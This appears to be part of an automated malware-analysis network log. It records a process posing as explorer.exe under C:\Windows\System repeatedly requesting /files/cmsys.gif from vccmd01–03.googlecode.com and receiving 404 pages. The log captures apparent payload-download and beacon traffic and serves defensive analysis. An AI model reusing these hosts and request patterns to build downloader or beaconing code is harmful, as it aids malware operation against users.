                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:34.742079973 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    43192.168.2.560683142.251.168.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:35.067876101 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd03.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:35.988657951 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:09:35 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:35.989598036 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    44192.168.2.56068564.233.166.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:37.835330009 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd01.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:38.748372078 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:09:38 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:38.748465061 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    45192.168.2.560686108.177.15.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:39.114418983 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd02.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:40.047117949 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:09:39 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:40.047192097 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    46192.168.2.560687142.251.168.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:40.258285999 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd03.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:41.190167904 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:09:41 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:41.190608025 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    47192.168.2.56068964.233.166.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:43.610707045 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd01.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:44.525393963 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:09:44 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:44.525490046 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    48192.168.2.560690108.177.15.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:44.734044075 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd02.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:45.650280952 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:09:45 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
